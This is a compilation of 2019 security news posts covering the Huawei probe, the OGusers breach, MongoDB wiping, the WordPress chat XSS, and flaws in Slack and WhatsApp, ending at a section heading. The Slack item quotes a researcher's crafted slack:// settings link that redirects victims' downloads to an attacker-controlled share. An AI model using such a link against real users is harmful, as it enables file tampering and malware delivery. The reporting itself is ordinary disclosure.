UPDATE May 15, 2019: “Charleston Man and Business Indicted in Federal Court in Over $9M Fraud” – United States Department of Justice issues a statement announcing Amir Golestan, 36, of Charleston, and Micfo, LLC, were charged in federal court in a twenty-count indictment. The indictment charges twenty counts of wire fraud, with each count punishable by up to 20 years imprisonment.

Related Resources:

Wireless Network Security Assessment Guide | 5 Step Assessment

Ten Best Network Scanning Tools for Network Security

The post Fraudulently Acquired IPv4 Addresses Revoked by ARIN appeared first on .

Dutch intelligence investigate alleged Huawei ‘backdoor’

Dutch intelligence services are probing Huawei for possibly spying for the Chinese government by using a “back door” in equipment of major telecoms firms.

Dutch intelligence probes Huawei for possibly spying for the Chinese government by using a “back door” in the equipment used by major telecoms firms.

Dutch intelligence shares the concerns raised by other western governments about the risks of involving the Chinese telco giant in the creation of the new 5G mobile phone infrastructure.

Since 2018, US Government has invitedd its allies to exclude Huawei equipment from critical infrastructure and 5G architectures.

According to Dutch newspaper De Volkskrant, the probe into Huawei is being led by the Dutch intelligence agency, AIVD.

The newspaper, citing intelligence sources, revealed that Huawei had alleged access to the data of customers of major telecoms firms in the country, including Vodafone, KPN and T-Mobile. In April, KPN announced a partnership with Huawei to update its 4G networks.

“The report comes at a crucial time in the Netherlands, with Dutch Prime Minister Mark Rutte expected to make an imminent decision on the extent of Huawei’s involvement in the country’s 5G infrastructure.” reported the Telegraph.

AIVD did not comment the report, its spokesman Hilbert Bredemeijer explained that the spy agency “does not comment on possible individual cases.”

Huawei Dutch intelligence

Huawei continues to refuse the accusation of cyber espionage, it also remarked that it is a private company not working for the Chinese intelligence apparatus.

“We do not respond to stories based on anonymous sources or speculation. We have been aware of a Task Force led by the NCTV (Ministry of Justice & Security) for some time to investigate the risks involved in the construction and use of 5G. That was previously announced in a letter from Minister Grapperhaus.” a Huawei spokesperson said.

“It is also known that the three major telecom parties are participating in the risk analysis of the vulnerability of 5G telecommunication networks. This involves looking at what measures are needed to minimize risks. We are in favor of taking general measures that can increase the resilience of telecommunications networks and that apply equally to all relevant parties. We look forward to the results of this report with confidence.”

The Dutch probe is part of a dispute between China and the United States over global trade and cyber espionage.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – 5G, Dutch intelligence services)

The post Dutch intelligence investigate alleged Huawei ‘backdoor’ appeared first on Security Affairs.

Nothing but the truth: the legacy of George Orwell’s Nineteen Eighty-Four

Every generation turns to it in times of political turmoil, and this extract from a new book about the novel examines its relevance in the age of fake news and Trump

Read other extracts from the book:
• David Bowie’s Orwell: how Nineteen Eighty-Four shaped Diamond Dogs
• ‘He typed in bed in his dressing gown’: how Orwell wrote Nineteen Eighty-Four

December 1948. A man sits at a typewriter, in bed, on a remote island, fighting to complete the book that means more to him than any other. He is terribly ill. The book will be finished and, a year or so later, so will the man.

January 2017. Another man stands before a crowd, which is not as large as he would like, in Washington DC, taking the oath of office as the 45th president of the United States of America. His press secretary says that it was the “largest audience to ever witness an inauguration – period – both in person and around the globe”. Asked to justify such a preposterous lie, the president’s adviser describes the statement as “alternative facts”. Over the next four days, US sales of the dead man’s book will rocket by almost 10,000%, making it a No 1 bestseller.

Continue reading...

May I have a word about… Pegasus spyware | Jonathan Bouquet

Is the powerful virus that infected WhatsApp a flying horse or a Trojan horse? Don’t ask the woman who developed it

The unsavoury revelations about the hacking of WhatsApp by software developed by Israeli company, NSO Group, raised some interesting imagery. NSO has developed a powerful smartphone virus called Pegasus, described by NSO co-founder Shalev Hulio as the company’s Trojan horse that could be sent “flying through the air” to infiltrate devices.

Right, let’s get this straight. Pegasus was the son of mortal Medusa and Poseidon, god of the sea. Pegasus and his brother Chrysaor were born from the blood of their beheaded mother, who was tricked and killed by Perseus. Pegasus was represented as a kind-hearted, gentle creature, somewhat naive but always eager to help.

Continue reading...

Number of hacktivist attacks declined by 95 percent since 2015

According to a study conducted by IBM, the number of hacktivist attacks that caused quantifiable damage has declined by 95 percent since 2015.

Even if in Italy the cells of the popular Anonymous collective are very active, the overall number of hacktivist attacks that caused in quantifiable damage to the victim has declined by 95 percent since 2015.

Researchers analyzed data collected by IBM’s X-Force threat intelligence unit between 2015 and 2019. Collected information shows a drop in the hacktivist attacks from 35 in 2015 to only 2 attacks in 2018.

hacktivists attacks 2

However, IBM experts only collected data on hacktivist attacks that resulted in quantifiable damage.

Most of the hacktivist attacks carried out between 2015 and 2018 were attributed to Anonymous (45%), followed at a distance by Lizard Squad (9%), and DownSec and New World Hackers (4%).

hacktivists attacks

“The “IBM X-Force Threat Intelligence Index 2019” highlighted troubling trends in the cybersecurity landscape, including a rise in vulnerability reporting, cryptojacking attacks and attacks on critical infrastructure organizations.” reads a blog post published by IBM. “Yet amid all the concern, there is one threat trend that our data suggests has been on the decline: hacktivism — the subversive use of internet-connected devices and networks to promote a political or social agenda.”

The experts believe that the decline in the number of attacks carried out by hacktivists is caused by two major factors: a drop in attacks launched by Anonymous, and the intensification of the operations conducted by law enforcement that led to the arrests of hacktivists.

Since 2010, Anonymous has become one of the most active collectives of hacktivists in the world, reaching a peak of activity in early- to mid-2016,

At the time, Anonymous hit several high-profile organizations, but according to IBM the group started to decline “possibly due to an attrition of key leadership, differences of opinion and a struggle to find an ideological focus.”

X-Force data shows only eight Anonymous attacks in 2015 and 2016, and only one in 2018.

Arrests and legal warnings targeting hacktivists had an important deterrent action, according to IBM law enforcement agencies in the U.S., U.K. and Turkey have arrested at least 62 hacktivists since 2011, but the actual number could be greater.

“Three of the arrested hacktivists received sentences in 2018 and 2019, all with prison time of three years or greater, including one with a 10-year prison sentence.” continues IBM.

The alleged Anonymous member, Martin Gottesfeld, was accused of launching DDoS attacks against the two US healthcare organizations in 2014, the Boston Children’s Hospital and the Wayside Youth and Family Support Network.

In January, the hacktivist was sentenced to 121 months in prison and the judge ordered to pay nearly $443,000 to compensate the damages.

“Where are hacktivist attacks likely to go from here? We are reluctant to say that the era of hacktivism has come to an end. Acute social justice issues, greater organizational capabilities among hacktivist groups and a stronger shift to areas that lay beyond the reach of law enforcement all have the potential to dramatically change the face of hacktivism in a relatively short period of time.” concludes IBM. “More likely than not, we are experiencing a lull in hacktivist activity rather than a conclusion.”

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – hacktivist attacks, hacking)

The post Number of hacktivist attacks declined by 95 percent since 2015 appeared first on Security Affairs.

Hackers Inject Scripts in WordPress Live Chat Plugin

Site administrators using WP Live Chat Support for WordPress are advised to upgrade the plug-in to the latest version to close persistent cross-site scripting (XSS) vulnerability that is exploited without any authentication.

Installed on more than 60,000 websites, the plug-in is presented as a free alternative to complete customer loyalty and chat solution.

The danger of automatic attacks

Sucuri researchers discovered that versions of the plug-in earlier than 8.0.27 are susceptible to persistent XSS issues that can be exploited remotely by a hacker who does not have an account on the affected site.

The hackers can automate their attacks and cover more victims, without having to authenticate on the target site. So going by the popularity of the plugin if you add it, and with little effort of the plugin, you are in for trouble.

Talking about XSS error, it’s quite serious issues, because it allows the hacker to place malicious code on websites or web applications, and then it compromises visitor accounts or shares them on modified pages.

XSS can be persistent if a malicious code is added to a section stored on the server, for instance, user comments. When a user loads the infected page, the malicious code is scanned by the browser and the attacker’s instructions are executed.

The details from Sucuri elucidates how exploiting this vulnerability could be due to unprotected “admin_init hook” – a common attack vector for WordPress plugins.

The researchers say that the wplc_head_basic function did not use the appropriate authorization controls to update the plug-in’s settings.

“Because the ‘admin_init’ hooks can be called by visiting /wp-admin/admin-post.php or /wp-admin/admin-ajax.php, an unauthenticated attacker can use these endpoints to get the ‘wplc_custom_js ‘update arbitrarily’, “Castros details

The content of the option is included on every page that loads live chat support so that hackers who reach a vulnerable site can insert JavaScript code on multiple pages

Sucuri informed developers of the plug-in on April 30 and a corrected version was released on Wednesday.

Related Resources:

Protect Your WordPress Website from SQL Injection

Yet Another WordPress Hack Exploiting Plugin Vulnerabilities

How to Clean Malware-Infected WordPress Website [Infographic]

WordPress Acting Weird? 10 Signs Your Site May Be Hacked


The post Hackers Inject Scripts in WordPress Live Chat Plugin appeared first on .

Dozens of Linksys router models leak data useful for hackers

Dozens of Linksys router models are affected by a flaw that causes the leak of data that can be used by attackers …. and the company won’t fix it.

Security researcher Troy Mursch, Chief Research Officer of Bad Packets, discovered that over 20,000 Linksys wireless routers are leaking full historical records of every device ever connected to them.

The leaked information includes devices’ unique identifiers, names, and operating systems, clearly, these data could be abused by hackers for attacks.

According to Mursch, the root cause of the data leak is a persistent vulnerability that resides in dozens of models of Linksys routers. Unfortunately, the flaw is very easy to exploit, and it is possible.

The devices continue to leak the information even when their firewall is turned on.

The expert used the Binary Edge IoT search engine to find vulnerable devices, earlier this week he discovered 25,617 routers that were leaking a total of 756,565 unique MAC addresses.

The disclosure of the historical records of devices that have connected to a specific router exposes the users to attacks, the knowledge of MAC addresses could be abuse by APT groups in targeted attacks, like the recent supply chain attack against ASUS.

The situation could be worse if owners of the routers were using default admin credentials. The issue discovered by the expert, in fact, could be used by attackers to discover if the vulnerable routers are still using default administrative passwords.

Mursch discovered that about 4,000 of the vulnerable devices were still using the default admin credentials. The vulnerable routers have remote access enabled by default, a gift for hackers that can perform a broad range of malicious activities, such as change DNS settings and deliver malware.

Mursch reported the flaw to Linksys, but unfortunately, the company closed the issue as “Not applicable / Won’t fix.”

Mursch published the list of vulnerable devices released on Pastebin.

Linksys flaw

If you are using one of the vulnerable devices you would replace it.

If you manage a MongoDB instance follow the guidelines on “how to secure a MongoDB database” 

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – LinkSys, Data leak)

The post Dozens of Linksys router models leak data useful for hackers appeared first on Security Affairs.

Breaches and Bugs: How Secure are Your Family’s Favorite Apps?

app safety

app safetyIs your family feeling more vulnerable online lately? If so, you aren’t alone. The recent WhatsApp bug and social media breaches recently have app users thinking twice about security.

Hackers behind the recent WhatsApp malware attack, it’s reported, could record conversations, steal private messages, grab photos and location data, and turn on a device’s camera and microphone. (Is anyone else feeling like you just got caught in the middle an episode of Homeland?)

There’s not much you and your family can do about an attack like this except to stay on top of the news, be sure to share knowledge and react promptly, and discuss device security in your home as much as possible.

How much does your family love its apps? Here’s some insight:

  • Facebook Messenger 3.408 billion downloads
  • WhatsApp 2.979 billion downloads
  • Instagram 1.843 billion downloads
  • Skype 1.039 billion downloads
  • Twitter 833.858 million downloads
  • Candy Crush 805.826 million downloads
  • Snapchat 782.837 million downloads

So, should you require your family to delete its favorite apps? Not even. A certain degree of vulnerability comes with the territory of a digital culture.

However, what you can and should do to ease that sense of vulnerability is to adopt proactive safety habits — and teach your kids — to layer up safeguards wherever possible.

Tips to Help Your Family Avoid Being Hacked

Don’t be complacent. Talk to your kids about digital responsibility and to treat each app like a potential doorway that could expose your family’s data. Take the time to sit down and teach kids how to lock down privacy settings and the importance of keeping device software updated. Counsel them not to accept data breaches as a regular part of digital life and how to fight back against online criminals with a security mindset.

Power up your passwords. Teach your kids to use unique, complex passwords for all of their apps and to use multi-factor authentication when it’s offered.

Auto update all apps. App developers regularly issue updates to fix security vulnerabilities. You can turn on auto updates in your device’s Settings.

Add extra security. If you can add a robust, easy-to-install layer of security to protect your family’s devices, why not? McAfee mobile solutions are available for both iOS and Android and will help safeguard devices from cyber threats.

Avoid suspicious links. Hackers send malicious links through text, messenger, email, pop-ups, or within the context of an ongoing conversation. Teach your kids to be aware of these tricks and not to click suspicious links or download unfamiliar content.

Share responsibly. When you use chat apps like WhatsApp or Facebook Messenger, it’s easy to forget that an outsider can access your conversation. Remind your children that nothing is private — even messaging apps that feel as if a conversation is private. Hackers are looking for personal information (birthday, address, hometown, or names of family members and pets) to crack your passwords, steal your identity, or gain access to other accounts.

What to Do If You Get Hacked

If one of your apps is compromised, act quickly to minimize the fallout. If you’ve been hacked, you may notice your device running slowly, a drain on your data, strange apps on your home screen, and evidence of calls, texts or emails you did not send.

Social media accounts. For Facebook and other social accounts, change your password immediately and alert your contacts that your account was compromised.

Review your purchase history. Check to see if there are any new apps or games installed that you didn’t authorize. You may have to cancel the credit card associated with your Google Play or iTunes account.

Revoke app access, delete old apps. Sometimes it’s not a person but a malicious app you may have downloaded that is wreaking havoc on your device. Encourage your kids to go through their apps and delete suspicious ones as well as apps they don’t use.

Bugs and breaches are part of our digital culture, but we don’t have to resign ourselves to being targets. By sharing knowledge and teaching kids to put on a security mindset, together, you can stay one step ahead of a cybercrook’s digital traps.

The post Breaches and Bugs: How Secure are Your Family’s Favorite Apps? appeared first on McAfee Blogs.

Account Hijacking Forum OGusers Hacked

Ogusers[.]com — a forum popular among people involved in hijacking online accounts and conducting SIM swapping attacks to seize control over victims’ phone numbers — has itself been hacked, exposing the email addresses, hashed passwords, IP addresses and private messages for nearly 113,000 forum users.

On May 12, the administrator of OGusers explained an outage to forum members by saying a hard drive failure had erased several months’ worth of private messages, forum posts and prestige points, and that he’d restored a backup from January 2019. Little did the administrators of OGusers know at the time, but that May 12 incident coincided with the theft of the forum’s user database, and the wiping of forum hard drives.

On May 16, the administrator of rival hacking community RaidForums announced he’d uploaded the OGusers database for anyone to download for free.

The administrator of the hacking community Raidforums on May 16 posted the database of passwords, email addresses, IP addresses and private messages of more than 113,000 users of Ogusers[.]com.

“On the 12th of May 2019 the forum was breached [and] 112,988 users were affected,” the message from RaidForums administrator Omnipotent reads. “I have uploaded the data from this database breach along with their website source files. Their hashing algorithm was the default salted MD5 which surprised me, anyway the website owner has acknowledged data corruption but not a breach so I guess I’m the first to tell you the truth. According to his statement he didn’t have any recent backups so I guess I will provide one on this thread lmfao.”

The database, a copy of which was obtained by KrebsOnSecurity, appears to hold the usernames, email addresses, hashed passwords, private messages and IP address at the time of registration for approximately 113,000 users (although many of these nicknames are likely the same people using different aliases).

The publication of the OGuser database has caused much consternation and drama for many in the community, which has become infamous for attracting people involved in hijacking phone numbers as a method of taking over the victim’s social media, email and financial accounts, and then reselling that access for hundreds or thousands of dollars to others on the forum.

Several threads on OGusers quickly were filled with responses from anxious users concerned about being exposed by the breach. Some complained they were already receiving phishing emails targeting their OGusers accounts and email addresses. 

Meanwhile, the official Discord chat channel for OGusers has been flooded with complaints and expressions of disbelief at the hack. Members vented their anger at the main forum administrator, who uses the nickname “Ace,” claiming he altered the forum functionality after the hack to prevent users from removing their accounts. One user on the Discord chat summed it up:

“Ace be like:

-not replace broken hard drives, causing the site to time warp back four months
– not secure website, causing user info to be leaked
– disable selfban so people can’t leave”

It’s difficult not to admit feeling a bit of schadenfreude in response to this event. It’s gratifying to see such a comeuppance for a community that has largely specialized in hacking others. Also, federal and state law enforcement investigators going after SIM swappers are likely to have a field day with this database, and my guess is this leak will fuel even more arrests and charges for those involved.

Simple Mitigation Tips For Securing Android E-Readers

Android e-readers are not taking any headlines when manufacturers are announcing their products. However, the e-ink based Android tablets are still selling like hotcakes, given it provides more flexibility than the similarly priced Amazon Kindle e-readers. Like the latter, no matter what type of book you open, the text is rendered against an old type of paper called sepia. There is an option under the setting menu, and you can add different gradation backgrounds such as wood, leather, solid color and so on. Reading on white background may be stressful for some, and Android e-readers provide the ability to change the background color of a book to the color that the user prefers. Not only can users change the background, but they can also change the color of text, hyperlinks, and so on.

If users like fonts, line spacing, alignment, and control of margins, they will love Android e-readers. There are many options to change all these features, Android always has the edge over kindle when it comes to customization. It’s good to customize the settings that they apply to whatever book the user opens next. Page turning speeds are fast, impressive, and users can read in both horizontal and vertical modes (ie, horizontal and vertical). The direction is locked by default but can be canceled immediately in the settings menu. The only thing that potentially may annoy users is the whole page turning experience, a strange line that turns the screen off every time users turn a page. It’s not just a screen refresh, but page feed takes a bit more time than the behavior of the Amazon Kindle. As users send pages, gestures, and swipe, these lines will follow and fill the page.

But unlike the Kindle e-readers, which provides basic e-ink reading capability, Android e-readers are full-time Android tablets but with an e-ink screen. That means all the vulnerabilities of a regular Android device affects the Android e-readers, in reciprocity, the feature that keeps Android secure such as the built-in antimalware, Google Play Protect is also installed in the Android e-reader device. The only weak part of Android e-readers is they are considered as legacy devices, that means it only comes with Android 4.0 Ice Cream Sandwich, with the latest version rocking Android 6.0 Marshmallow which was released three years ago.

Android e-readers are no longer occupying store shelves, and usually can only be bought from online stores. As Android 4.x and 6.x are considered old versions of Android, and no longer receives patches from Google, a heightened level of security awareness is required to continue the safe usage of the device.

Here are some of our recommendations:

Only associate your Google Account if you need to access the Google Play Store
That means the Google Account does not need to be saved on the device. Associate the Google account only if a new app needs to be downloaded from the Play Store. That will help preserve the security and privacy of the Google account in the event the e-reader captures malware. In an infected Android device, the associated Google Account is at risk of getting used for nefarious purposes. So better not have the account associated with the device if there are no new apps that need to be installed.

Turn-off Bluetooth component if not used
Keep the device isolated, without access to Bluetooth, means there is no chance from a 3rd party to send files to the e-reader.

Only use legitimate apps (never sideload)
Apps should only be downloaded from the official source, the Google Play Store. This way, the Google Play Protect will kick-in and scan the apps first before installation.

See if using a full Android tablet or phone will be a better experience
Evaluate if you really need to continue using the e-reader, it is using a very old Android version which is considered as not safe for typical daily usage when connected online. Replace the device with a regular tablet or phone, if not keep it offline instead of being visible in the public Internet.

Also, Read:

7 Android Security Features You Never Knew You Needed

Nexus and Pixel devices now has Google’s Android Security Patch

Fortnite’s Accidental Revelation of Android’s Security Weakness

Google Launches Play Protect for Android Device Security

The 6 Deadly Mobile Security Threats

The post Simple Mitigation Tips For Securing Android E-Readers appeared first on .

Unistellar attackers already wiped over 12,000 MongoDB databases

Unistellar attackers have already wiped roughly 12,000 unsecured MongoDB databases exposed online
over the past three.

Every time hackers deleted a MongoDB database they left a message asking the administrators to contact them to restore the data.

Unfortunately, the criminal practice of deleting MongoDB databases and request a ransom to restore data is common, experts observed several campaigns targeting unsecured archive exposed online.

In the last wave of attacks, crooks don’t request the payment of a specific ransom amount, instead, they provide an email contact to start a negotiation.

Bleeping Computer first reported the attacks and cited the expert Sanyam Jain as the person that discovered the deleted MongoDB databases.

“this person might be charging money in cryptocurrency according to the sensitiveness of the database.” explained Jain.

The expert discovered 12,564 unprotected MongoDB DBs that were wiped by an attacker tracked as Unistellar, he searched the text “hacked_by_unistellar” that the attacker left in the message.

Making the same search on Shodan experts at BleepingComputer found a smaller number, 7,656 databases, while doing the same search I found 8.133 compromised installs exposed online.
It is likely the attacker has automated its attacks chain due to the lange number of MongoDB databases deleted by Unistellar.

Unistellar MongoDB wiped

Jain first discovered the attacks on April 24, the note left by the Unistellar attacker reads “Restore ? Contact :

The attacker used two email addresses in these attacks, or

According to Jain, Unistellar creates restore points to restore the databases after the victims have paid the ransom.

If you manage a MongoDB instance follow the guidelines on “how to secure a MongoDB database” 

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Unistellar attacks, MongoBD)

The post Unistellar attackers already wiped over 12,000 MongoDB databases appeared first on Security Affairs.

Facebook banned Archimedes Group, misinformation made in Israel

A new political misinformation campaign was uncovered and blocked by Facebook, this time it was not operated by Russia but Israel’s Archimedes Group

Facebook uncovered and blocked a misinformation campaign powered by Israel’ Archimedes Group, the corporation used fake accounts to manipulated political campaigns.

According to Facebook, the Archimedes Group used hundreds of pages, accounts, and groups in the attempt to influence the public sentiment on political discussions.

The misinformation focused on specific countries in Africa (Nigeria, Senegal, Togo, Angola, Niger, and Tunisia), Latin America and Southeast Asia. The operators behind this campaign posed themselves as local people and organizations to fuel the debate on specific political events.

“Today we removed 265 Facebook and Instagram accounts, Facebook Pages, Groups and events involved in coordinated inauthentic behavior. This activity originated in Israel and focused on Nigeria, Senegal, Togo, Angola, Niger and Tunisia along with some activity in Latin America and Southeast Asia.” wrote Nathaniel Gleicher, Head of cybersecurity Policy at Facebook. “The people behind this network used fake accounts to run Pages, disseminate their content and artificially increase engagement.”

Facebook banned Archimedes Group and all of its subsidiaries from its social media platforms.

Facebook shared some interesting details about the efforts of the corporations in spreading fake news to change the perception of the reality:

  • Presence on Facebook and Instagram: 65 Facebook accounts, 161 Pages, 23 Groups, 12 events and four Instagram accounts.
  • Followers: About 2.8 million accounts followed one or more of these Pages, about 5,500accounts joined at least one of these Groups and around 920 people followed one or more of these Instagram accounts.
  • Advertising: Around $812,000 in spending for ads on Facebook paid for in Brazilian reals, Israeli shekel, and US dollars. The first ad ran in December 2012 and the most recent ad ran in April 2019.
  • Events: Nine events were hosted by these Pages. The first was scheduled for October 2017 and the most recent was scheduled for May 2019. Up to 2,900 people expressed interest in at least one of these events, and a portion of their accounts were previously identified and disabled as fake. We cannot confirm whether any of these events actually occurred.

Facebook provided an example of the type of content that was removed, the following image is related to Martin Fayulu, leader of the Engagement for Citizenship and Development party in the Democratic Republic of the Congo.


Archimedes Group invested a total of $812,000 on Facebook ads, these figures could give you an idea about the strategic importance of social networks in misinformation campaigns.

“It has repeatedly violated our misrepresentation and other policies, including by engaging in coordinated inauthentic behavior,” Facebook says. “This organization and all its subsidiaries are now banned from Facebook, and it has been issued a cease and desist letter.”

Now the question is, who paid this campaign?

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

I’m one of the finalists thanks to your support

Thank you


Pierluigi Paganini

(SecurityAffairs – Facebook, Archimedes Group

The post Facebook banned Archimedes Group, misinformation made in Israel appeared first on Security Affairs.

Our Long Collective Struggle To Secure Enterprise Email

Email is the oldest service on the Internet, launched in the 1970’s, it is older than the WWW or the World Wide Web itself for more than three decades. However, the fundamentals of sending and receiving email have not fundamentally changed, in fact, all the weaknesses of the email systems of the 70s are still hounding us today. In 1978, we witnessed the first spam email sent to thousands of corporate email users. The other threats such as malware and phishing through email followed soon after.

These threats take advantage of the basic foundation of email, which is accessibility and open-ended approach to transferring information. Security is never the foundation of email when it was first conceptualized by the fathers of the Internet. It is a direct product of the TCP/IP (Transmission Control Protocol/Internet Protocol), where scientists are able to communicate with one another the results of their experiments and research.

When email and the rest of the Internet became a “public sphere” as opposed to the initial “for military use only”, opportunity seekers look at it and found a new home when it comes to exploiting the weaknesses at the expense of unsuspecting users. The number of cyber attacks targeting countries and companies is increasing, and information security measures are now a matter of life and death for companies. At the same time, however, the combination of business and IT has progressed, and while numerous IT investments are required, the amount of investment in security is a reality. Similarly, many IT personnel are busy with various tasks, making it difficult to specialize in security measures.

Under such circumstances, effective use of security solutions is essential to obtain a safe and secure environment including business partners and customers. Above all, the most important point is how to secure the security of “mail” which is said to occupy 80 to 90% of the attack path. It goes without saying that even among the damage caused by cyber attacks, it is information leakage that brings fatal damage to companies. Targeted attack emails and emails such as phishing emails often use messages that spoof legitimate senders, such as business partners, financial institutions, and public organizations. And the reason why the damage globally has been increasing in the last two decades is that the methods for infecting the sentences and malware described in such malicious emails have been refined.

Is there a permanent solution?
As an attack method by email, attachment files of malware such as ransomware and URL spoofing (redirection) are often used. In the latter case, if you click on the URL link in the mail, you will be diverted to a falsified website, etc. and you will be forced to download malware, etc. And please be aware that in such email-based attacks, the pattern of spam emails, which was previously thought to cause no direct harm to the system, is rapidly increasing.

Spam email is an advertising email sent indiscriminately to an unspecified number of people, often referred to as “spam”. In the past, the damage caused by spam emails was such that sending many unnecessary emails interfered with business operations, and the effort for deletion would be unrelentingly costly. However, recently, in addition to these, as mentioned above, it has become a trigger for malware infection or is being used for phishing scams. Also, there are more cases where Botnet, which sends large-scale spam emails, is the source of ransomware.

There is no other defense but for users to develop a sense of doubt when receiving emails. A reasonable level of suspicion does not hurt, in fact, it is even safer to actually call the sender of the email to verify if that person actually sent an email. There is no system that can 100% prevent email risks, but there will always be a human standing in the way. The point of getting a network infected or a company falling for spear phishing is the human user of the system representing the company. All employees are the frontliners in all corporate IT security arrangement.

Also, Read:

Avoid These Mistakes, Ensure Better Enterprise Security

Is It Possible To Have Email Security Without OpenPGP/S-MIME?

Mimecast Quarterly Report: 25% Of Spam and Malicious Emails Bypass Security Systems

How Enterprises Can Combat Cybersecurity Challenges On The Cloud

Can Artificial Intelligence Boost Future Email Security?

The post Our Long Collective Struggle To Secure Enterprise Email appeared first on .

Israeli firm linked to WhatsApp spyware attack faces lawsuit

Amnesty International fears its staff may be ‘surveilled via NSO Pegasus software’

The Israeli firm linked to this week’s WhatsApp hack is facing a lawsuit backed by Amnesty International, which says it fears its staff may be under surveillance from spyware installed via the messaging service.

Related: WhatsApp urges users to update app after discovering spyware vulnerability

Related: WhatsApp spyware attack was attempt to hack human rights data, says lawyer

Related: WhatsApp hack: have I been affected and what should I do?

Continue reading...

Chinese state-sponsored hackers breached TeamViewer in 2016

The German newspaper Der Spiegel revealed that the software company behind TeamViewer was compromised in 2016 by Chinese hackers.

China-linked hackers breached German software company behind TeamViewer in 2016, this news was reported by the German newspaper Der Spiegel


According to the media outlet, Chinese state-sponsored hackers used the
Winnti trojan malware to infect the systems of the Company.

The Winnti group was first spotted by Kaspersky in 2013, according to the researchers the gang has been active since 2007.

The gang is financially-motivated and was mostly involved in cyber espionage campaigns.  The hackers were known for targeting companies in the online gaming industry, the majority of the victims is located in Southeast Asia.

The Winnti cyberespionage group is known for its ability in targeting supply chains of legitimate software to spread malware.

According to the company, it was targeted by the hackers in autumn 2016, when its experts detected suspicious activities were quickly blocked them to prevent major damages.

TeamViewer spokesperson revealed that the company investigated the attempts of intrusion, but did not find any evidence of exposure for customer data and sensitive data.

Der Spiegel pointed out that TeamViewer did not disclose the security breach to the public.

“In autumn 2016, TeamViewer was target of a cyber-attack. Our systems detected the suspicious activities in time to prevent any major damage. An expert team of internal and external cyber security researchers, working together closely with the responsible authorities, successfully fended off the attack and with all available means of IT forensics found no evidence that customer data or other sensitive information had been stolen, that customer computer systems had been infected or that the TeamViewer source code had been manipulated, stolen or misused in any other way.” said company spokesman.

“Out of an abundance of caution, TeamViewer conducted a comprehensive audit of its security architecture and IT infrastructure subsequently and further strengthened it with appropriate measures.”

At the time the company published a statement to exclude it was breached by hackers:

Göppingen/Germany, May 23, 2016. A recent article warns, “TeamViewer users have had their bank accounts emptied by hackers gaining full-system access”. TeamViewer is appalled by any criminal activity; however, the source of the problem, according to our research, is careless use, not a potential security breach on TeamViewer’s side.” wrote the company.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

I’m one of the finalists thanks to your support

Thank you


Pierluigi Paganini

(SecurityAffairs – TeamViewer, hacking)

The post Chinese state-sponsored hackers breached TeamViewer in 2016 appeared first on Security Affairs.

A flaw in Slack could allow hackers to steal, manipulate downloaded files

A recently patched flaw in the Slack desktop application for Windows can be exploited by attackers to steal and manipulate a targeted user’s downloaded files.

Slack is a cloud-based set of proprietary team collaboration tools and services,

Security researcher David Wells from Tenable discovered a critical flaw in version 3.3.7 of the Slack desktop app that could be exploited to steal and manipulate a targeted user’s downloaded files.

The issue is classified as a download hijacking vulnerability that can be triggered by tricking a user into clicking on a specially crafted link pasted into a Slack channel.

Slack addressed the flaw with the release of version 3.4.0.

Wells discovered that that is it possible to use slack:// links to change change Slack app settings if clicked, including the
PrefSSBFileDownloadPath setting that specifies the location where a user’s files are downloaded. An attacker could use a specially crafted link that when clicked, changes the targeted user’s download destination to a path specified by the attacker, for example, a remote SMB share.

“Crafting a link like “slack://settings/?update={‘PrefSSBFileDownloadPath’:’<pathHere>’}” would change the default download location if clicked (until manually changed back).” reads a blog post published by the expert. “The links however, cannot contain certain characters, as Slack filters them out. One of these characters is the “:” (colon) which means we can’t actually supply a path with drive root. An SMB share, however, completely bypassed this sanitation as there is no root drive needed.”

Slack download

Wells also discovered that an attacker could manipulate the downloaded file stored in the location they set up.

“Furthermore, we could have easily manipulated the download item when we control the share it’s uploaded to, meaning the Slack user that opens/executes the downloaded file will actually instead be interacting with our modified document/script/etc off the remote SMB share, the options from there on are endless.”

An attacker can inject malware into an Office file downloaded by the victim.

The links devised by the expert can be pasted to a Slack channel or a private conversation to which the attacker has access.

But, is it possible to paste the link to Slack channels where attackers are not part of?

The expert discovered that an unauthenticated attacker can change the location of downloaded files using RSS feeds. Slack channels, in fact. can subscribe to RSS feeds to populate a channel with site updates which can contain links. 

In this case, the hacker has to trick the victim into clicking on a specially crafted RSS feed link posted online. The download location can be changed even if the attacker has not access to the victim’s Slack workspace.

Lets consider an example with, here I could make a post to a very popular Reddit community that Slack users around the world are subscribed to (in this test case however, I chose a private one I owned). I will drop an http link (because slack:// links are not allowed to be hyperlinked on Reddit) that will redirect to our malicious slack:// link and change settings when clicked.” adds Wells.

“While less effective, these hyperlink attacks could be done without Slack channel authentication, via external .rss feeds or other content pulled into a Slack channel from an external source that may contain attacker-crafted hyperlinks.” Tenable explained.

“This attack could be launched by someone outside of the organization but there are variables that might reduce the chances of success, like knowing which .rss feeds the target Slack subscribes to,”

The flaw has been classified as “medium severity” because it required user interaction. Slack awarded $500 the researcher under its bug bounty program.

Users should check that they are running the latest version.

Pierluigi Paganini

(SecurityAffairs – Slack, hacking)

The post A flaw in Slack could allow hackers to steal, manipulate downloaded files appeared first on Security Affairs.

How MVISION Mobile can combat the WhatsApp Buffer Overflow Vulnerability

A new WhatsApp vulnerability has attracted the attention of the press and security professionals around the world. We wanted to provide some information and a quick summary.

This post will cover vulnerability analysis and how McAfee MVISION Mobile can help.


On May 13th, Facebook announced a vulnerability associated with all of its WhatsApp products. This vulnerability was reportedly exploited in the wild, and it was designated as CVE-2019-3568.

WhatsApp told the BBC its security team was the first to identify the flaw. It shared that information with human rights groups, selected security vendors and the US Department of Justice earlier this month.

The CVE-2019-3568 Vulnerability Explained

